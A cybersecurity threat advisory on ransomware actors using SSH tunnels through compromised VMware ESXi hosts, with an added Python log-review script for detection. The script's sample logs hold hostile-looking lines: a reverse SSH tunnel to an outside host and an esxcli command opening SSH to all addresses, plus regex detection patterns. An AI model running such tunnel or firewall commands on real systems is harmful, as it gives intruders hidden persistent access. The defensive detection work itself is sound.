What is the threat?
Cybercriminals are targeting VMware ESXi systems by leveraging compromised appliances to route traffic to their C2 infrastructure, enabling them to evade detection. Once compromised, attackers can steal data and encrypt files, effectively crippling the organization by rendering all virtual machines inaccessible.
Why is this noteworthy?
Threat actors can compromise VMware ESXi systems by using compromised admin credentials or by exploiting a known security vulnerability to bypass authentication protections. Once they gain access, they set up a tunnel using SSH or other similar tools. SSH is a powerful tool that administrators use for remote management and troubleshooting. However, in the hands of attackers, it becomes a tool for persistence, lateral movement, and stealthy communication with C2 servers.
What is the exposure or risk?
Once attackers gain admin access, they can take advantage of the continuous operation and minimal downtime of ESXi appliances to keep the backdoor accessible for extended periods of time, making it an ideal entry point.
To detect attacks involving SSH tunneling on ESXi appliances, organizations are advised to review the following four log files:
- /var/log/shell.log (ESXi shell activity log)
- /var/log/hostd.log (Host agent log)
- /var/log/auth.log (authentication log)
- /var/log/vobd.log (VMware observer daemon log)
What are the recommendations?
Barracuda recommends the following actions to protect your environment against this threat:
- Protect SSH access to ESXi servers with multi-factor authentication (MFA), especially for remote administrative access.
- Use complex passwords for SSH and administrative accounts, and regularly rotate credentials.
- Restrict SSH access to only necessary users and systems. Use a least-privilege model to minimize unnecessary access.
- Monitor for unusual SSH traffic or tunneling behavior, such as encrypted traffic to unexpected destinations.
- Keep ESXi servers up to date with the latest security patches.
- Enable detailed logging of all SSH access and system activity. Regularly review logs for unauthorized or suspicious logins, tunnel creation, or changes to the ESXi system.
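The following script is an added example, not part of the original advisory or of any Barracuda tooling. It puts the two detection items above into practice: reviewing the four log files listed under "What is the exposure or risk?" and the final recommendation to look for suspicious logins, tunnel creation, and changes to the ESXi system. The log lines are constructed approximations of ESXi output, the management network 10.10.0.0/16 is an assumption, and the regular expressions are starting heuristics that should be tuned against logs from your own hosts.

```python
"""Heuristic review of the four ESXi log files named in the advisory.

Added example code. The sample lines below are constructed approximations
of ESXi log formats, not captured output; tune the patterns to real logs.
"""
import ipaddress
import re
from collections import Counter
from dataclasses import dataclass

# Assumption: management networks from which admin SSH logins are expected.
ALLOWED_ADMIN_NETS = [ipaddress.ip_network("10.10.0.0/16")]

# Constructed sample lines keyed by the four log files the advisory names.
SAMPLE_LOGS = {
    "/var/log/hostd.log": [
        "2025-01-20T02:14:03Z hostd[2098]: Starting service TSM-SSH",
        "2025-01-20T02:14:05Z hostd[2098]: Service TSM-SSH started",
    ],
    "/var/log/auth.log": [
        "2025-01-20T02:15:10Z sshd[3321]: Accepted password for root from 10.10.4.20 port 51500 ssh2",
        "2025-01-20T02:15:42Z sshd[3325]: Accepted password for root from 203.0.113.45 port 51522 ssh2",
    ],
    "/var/log/shell.log": [
        "2025-01-20T02:16:01Z shell[3390]: [root]: esxcli system version get",
        "2025-01-20T02:16:20Z shell[3390]: [root]: ssh -f -N -R 8443:127.0.0.1:443 ops@198.51.100.7",
        "2025-01-20T02:16:40Z shell[3390]: [root]: esxcli network firewall ruleset set --ruleset-id sshServer --allowed-all true",
    ],
    "/var/log/vobd.log": [
        "2025-01-20T02:14:05Z vobd[2010]: [UserLevelCorrelator] SSH access has been enabled.",
    ],
}

# SSH service being (re)enabled, as seen from hostd and vobd.
SSH_ENABLED_RE = re.compile(r"TSM-SSH started|SSH access has been enabled", re.I)
# Successful SSH login: capture the account and the source address.
ACCEPTED_LOGIN_RE = re.compile(r"Accepted \w+ for (\S+) from (\S+) port \d+")
# ssh invoked with a forwarding flag: -R (remote), -L (local), -D (SOCKS), -w (tun).
TUNNEL_RE = re.compile(r"\bssh\b.*\s-[A-Za-z]*[RLDw]\b")
# Changes to the host firewall (SSH exposure) or to syslog forwarding.
CONFIG_CHANGE_RE = re.compile(
    r"\besxcli\s+(network\s+firewall|system\s+syslog)\b.*\b(set|add|remove)\b"
)


@dataclass
class Finding:
    log: str
    rule: str
    line: str


def _from_allowed_net(addr: str, nets) -> bool:
    """True only if the address parses and sits inside an allowed network."""
    try:
        ip = ipaddress.ip_address(addr)
    except ValueError:
        return False  # an unparsable source is treated as unexpected
    return any(ip in net for net in nets)


def scan_logs(logs: dict, allowed_nets=ALLOWED_ADMIN_NETS) -> list:
    """Apply the per-file heuristics and return every matching line."""
    findings = []
    for path, lines in logs.items():
        for line in lines:
            if path.endswith(("hostd.log", "vobd.log")) and SSH_ENABLED_RE.search(line):
                findings.append(Finding(path, "ssh_service_enabled", line))
            elif path.endswith("auth.log"):
                m = ACCEPTED_LOGIN_RE.search(line)
                if m and not _from_allowed_net(m.group(2), allowed_nets):
                    findings.append(Finding(path, "login_from_unexpected_source", line))
            elif path.endswith("shell.log"):
                if TUNNEL_RE.search(line):
                    findings.append(Finding(path, "ssh_tunnel_command", line))
                elif CONFIG_CHANGE_RE.search(line):
                    findings.append(Finding(path, "ssh_or_logging_config_change", line))
    return findings


def summarize(findings: list) -> dict:
    """Count findings per rule, which is what a daily review report needs."""
    return dict(Counter(f.rule for f in findings))


if __name__ == "__main__":
    results = scan_logs(SAMPLE_LOGS)
    for f in results:
        print(f"{f.rule:32s} {f.log}: {f.line}")
    print(summarize(results))
```

On the constructed sample the scan flags the SSH service start in hostd.log and vobd.log, the root login from 203.0.113.45 outside the assumed management network, the `ssh -R` remote port forward in shell.log, and the firewall ruleset change that opens SSH to all addresses, while the login from 10.10.4.20 and the harmless `esxcli system version get` pass. On a real host, read the files from the paths in the dict instead of the embedded samples and forward the findings to whatever ticketing or SIEM process your review uses.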
References
For more in-depth information, please visit the following links:
- https://thehackernews.com/2025/01/ransomware-targets-esxi-systems-via.html
- https://vocal.media/01/ransomware-gang-exploits-ssh-tunnels-for-stealthy-v-mware-es-xi-access
- https://www.techzine.eu/news/security/128117/cybercriminals-use-ssh-tunnelling-to-access-vmware-esxi/
If you have any questions about this Cybersecurity Threat Advisory, don’t hesitate to get in touch with Barracuda Managed XDR’s Security Operations Center.
This post originally appeared on Smarter MSP.